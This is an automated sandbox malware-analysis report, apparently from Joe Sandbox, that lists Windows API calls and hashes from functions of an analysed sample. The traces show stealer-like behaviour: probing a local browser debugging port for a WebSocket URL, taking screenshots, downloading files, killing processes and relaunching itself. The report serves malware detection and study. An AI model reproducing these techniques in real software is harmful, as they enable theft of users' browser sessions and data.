                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004490FC
                        • InternetCloseHandle.WININET(00000000), ref: 00449109
                        • InternetReadFile.WININET(?,?,?,00000000), ref: 00449166
                        • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00449197
                        • InternetCloseHandle.WININET(00000000), ref: 004491A2
                        • InternetCloseHandle.WININET(00000000), ref: 004491A9
                        • strlen.MSVCRT ref: 004491BA
                        • strlen.MSVCRT ref: 004491ED
                        • strlen.MSVCRT ref: 0044922E
                        • strlen.MSVCRT ref: 0044924C
                          • Part of subcall function 00448980: std::_Xinvalid_argument.LIBCPMT ref: 00448996
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                        • API String ID: 1530259920-2144369209
                        • Opcode ID: efdf98e0c5c32d3e40be0a79b0ec1f2fcb598a43e51e108aa1ee359e722af079
                        • Instruction ID: e3ef690ede61b08487c8e930c4e082f2fd3c05ca1b2e17d48f71de6d605d64af
                        • Opcode Fuzzy Hash: efdf98e0c5c32d3e40be0a79b0ec1f2fcb598a43e51e108aa1ee359e722af079
                        • Instruction Fuzzy Hash: A351E871640205ABE714DFA8DC45FEEF7F9DB48710F14416AF909E3280DBB8AD4487A9
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 004616A1
                        • lstrcpy.KERNEL32(00000000,0157B860), ref: 004616CC
                        • lstrlen.KERNEL32(?), ref: 004616D9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004616F6
                        • lstrcat.KERNEL32(00000000,?), ref: 00461704
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0046172A
                        • lstrlen.KERNEL32(0158A620), ref: 0046173F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00461762
                        • lstrcat.KERNEL32(00000000,0158A620), ref: 0046176A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461792
                        • ShellExecuteEx.SHELL32(?), ref: 004617CD
                        • ExitProcess.KERNEL32 ref: 00461803
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                        • String ID: <
                        • API String ID: 3579039295-4251816714
                        • Opcode ID: 01cea721eb63318a8a8aa02da1de81b176db2a1fff685a34aa6ad4247bc703f2
                        • Instruction ID: 387ec38c57d168f4151db1c01fd1f04f6131ed1455694715f85f15da17bda9ab
                        • Opcode Fuzzy Hash: 01cea721eb63318a8a8aa02da1de81b176db2a1fff685a34aa6ad4247bc703f2
                        • Instruction Fuzzy Hash: 8F51B370A01219AFDB15DFB5CD84A9FB7FAAF48301F44412AF509E3361EB74AE418B64
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045EFE4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045F012
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0045F026
                        • lstrlen.KERNEL32(00000000), ref: 0045F035
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 0045F053
                        • StrStrA.SHLWAPI(00000000,?), ref: 0045F081
                        • lstrlen.KERNEL32(?), ref: 0045F094
                        • lstrlen.KERNEL32(00000000), ref: 0045F0B2
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0045F0FF
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0045F13F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$AllocLocal
                        • String ID: ERROR
                        • API String ID: 1803462166-2861137601
                        • Opcode ID: c37099af99af76db4f1979232da8151625ba2c654f4bdf1cee71e1d658d7e948
                        • Instruction ID: 58568faf0fd5969d09221dfe33cbda0b15e2544e3a34ab09d879393ee044c322
                        • Opcode Fuzzy Hash: c37099af99af76db4f1979232da8151625ba2c654f4bdf1cee71e1d658d7e948
                        • Instruction Fuzzy Hash: B951BE31A101019FDB21AF75DC49AAFB7A5AF45705F04402EFC099B313DB78DC098BAA
                        APIs
                        • GetEnvironmentVariableA.KERNEL32(01588F38,00679BD8,0000FFFF), ref: 0044A026
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044A053
                        • lstrlen.KERNEL32(00679BD8), ref: 0044A060
                        • lstrcpy.KERNEL32(00000000,00679BD8), ref: 0044A08A
                        • lstrlen.KERNEL32(00474C4C), ref: 0044A095
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044A0B2
                        • lstrcat.KERNEL32(00000000,00474C4C), ref: 0044A0BE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044A0E4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044A0EF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044A114
                        • SetEnvironmentVariableA.KERNEL32(01588F38,00000000), ref: 0044A12F
                        • LoadLibraryA.KERNEL32(0158D890), ref: 0044A143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                        • String ID:
                        • API String ID: 2929475105-0
                        • Opcode ID: b2519a4777dd56c78fd575e0956c8dd0366bc3ca208d2bd7005b1fdd4b8dfb3c
                        • Instruction ID: 51ecc4b1290d7d0bfcd9fe5dc34b1aef7861261c02e4fd68289484ec5ea3c976
                        • Opcode Fuzzy Hash: b2519a4777dd56c78fd575e0956c8dd0366bc3ca208d2bd7005b1fdd4b8dfb3c
                        • Instruction Fuzzy Hash: F691E3706806019FF7349FA4DC48A6737A6BB58704F40505AF80987362EFBDDC90CB9A
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045C8A2
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045C8D1
                        • lstrlen.KERNEL32(00000000), ref: 0045C8FC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045C932
                        • StrCmpCA.SHLWAPI(00000000,00474C3C), ref: 0045C943
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 5479565f607ed45e07648aea450f0514f278b3edd9d63c5aaff2f164c1d01972
                        • Instruction ID: 9500855d9f5a2fffd65e034ff705bad297b3e73808bb4ca03a03c5336363ccce
                        • Opcode Fuzzy Hash: 5479565f607ed45e07648aea450f0514f278b3edd9d63c5aaff2f164c1d01972
                        • Instruction Fuzzy Hash: 5161B171A103159FDB11EFB58884AAFBBF9AF09345F00002AEC45E7342D77C8D098BA9
                        APIs
                        • memset.MSVCRT ref: 0046451A
                        • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00454F39), ref: 00464545
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0046454C
                        • wsprintfW.USER32 ref: 0046455B
                        • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004645CA
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004645D9
                        • CloseHandle.KERNEL32(00000000,?,?), ref: 004645E0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                        • String ID: 9OE$%hs$9OE
                        • API String ID: 3729781310-4137692398
                        • Opcode ID: 397c6a43e9a5b8d50fe583ceb057a00ec95071c39e56876f3b4072cabe2e5c1e
                        • Instruction ID: 65a8ef1d2906933e6a24ccdeadcba3431d55365a6a1f6e15e1e519cf5adba6b0
                        • Opcode Fuzzy Hash: 397c6a43e9a5b8d50fe583ceb057a00ec95071c39e56876f3b4072cabe2e5c1e
                        • Instruction Fuzzy Hash: F4317371A40205BBDB14DBE4DC49FDE77B9FF45700F10405AFA0AE7180EB746A818BAA
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00460CF0), ref: 00464276
                        • GetDesktopWindow.USER32 ref: 00464280
                        • GetWindowRect.USER32(00000000,?), ref: 0046428D
                        • SelectObject.GDI32(00000000,00000000), ref: 004642BF
                        • GetHGlobalFromStream.COMBASE(00460CF0,?), ref: 00464336
                        • GlobalLock.KERNEL32(?), ref: 00464340
                        • GlobalSize.KERNEL32(?), ref: 0046434D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                        • String ID:
                        • API String ID: 1264946473-0
                        • Opcode ID: b431bf5269754c488dacd9f1645862f7befb367be5f582db787701f91c977c26
                        • Instruction ID: 696550df4250bc592f95730e4e1a77229c27e1866da20d4929077e78680fb5bb
                        • Opcode Fuzzy Hash: b431bf5269754c488dacd9f1645862f7befb367be5f582db787701f91c977c26
                        • Instruction Fuzzy Hash: FE514E75A10208AFDB14EFA4DD89AEEB7B9EF48304F10501AF905E3250DB78AD41CBA5
                        APIs
                        • lstrcat.KERNEL32(?,0158E508), ref: 0045E00D
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0045E037
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E06F
                        • lstrcat.KERNEL32(?,00000000), ref: 0045E07D
                        • lstrcat.KERNEL32(?,?), ref: 0045E098
                        • lstrcat.KERNEL32(?,?), ref: 0045E0AC
                        • lstrcat.KERNEL32(?,0157B6D0), ref: 0045E0C0
                        • lstrcat.KERNEL32(?,?), ref: 0045E0D4
                        • lstrcat.KERNEL32(?,0158DA90), ref: 0045E0E7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E11F
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0045E126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 4230089145-0
                        • Opcode ID: 1b6982f7f8a099eb10479d3371e1679ca1f122cf0be311b1664520e67925837b
                        • Instruction ID: e3d84b2a99bfd65dde5b86f6b4cb51968091be11be95f73a044cde1424513a77
                        • Opcode Fuzzy Hash: 1b6982f7f8a099eb10479d3371e1679ca1f122cf0be311b1664520e67925837b
                        • Instruction Fuzzy Hash: D261BF71A1011CEBDB19DB64CD44ADEB3B5BF48300F5049AABA09A3351DB749F858FA4
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00446AFF
                        • InternetOpenA.WININET(0046CFEC,00000001,00000000,00000000,00000000), ref: 00446B2C
                        • StrCmpCA.SHLWAPI(?,0158EAA8), ref: 00446B4A
                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00446B6A
                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00446B88
                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00446BA1
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00446BC6
                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00446BF0
                        • CloseHandle.KERNEL32(00000000), ref: 00446C10
                        • InternetCloseHandle.WININET(00000000), ref: 00446C17
                        • InternetCloseHandle.WININET(?), ref: 00446C21
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                        • String ID:
                        • API String ID: 2500263513-0
                        • Opcode ID: c6c473d14e280d03a72ba60acf176d69d4b53a5d5b68c1913a7a41a0665df1df
                        • Instruction ID: 8d7672dfc6f470112ccf7df771ba97bc86671a8eff4a9721d30345e3d9f14f32
                        • Opcode Fuzzy Hash: c6c473d14e280d03a72ba60acf176d69d4b53a5d5b68c1913a7a41a0665df1df
                        • Instruction Fuzzy Hash: 3E41B471640215AFEB24DF64DC49FAF77B9EB44704F004459FA09E7280DF74AE408BA9
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044BC1F
                        • lstrlen.KERNEL32(00000000), ref: 0044BC52
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044BC7C
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044BC84
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044BCAC
                        • lstrlen.KERNEL32(00474AD4), ref: 0044BD23
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
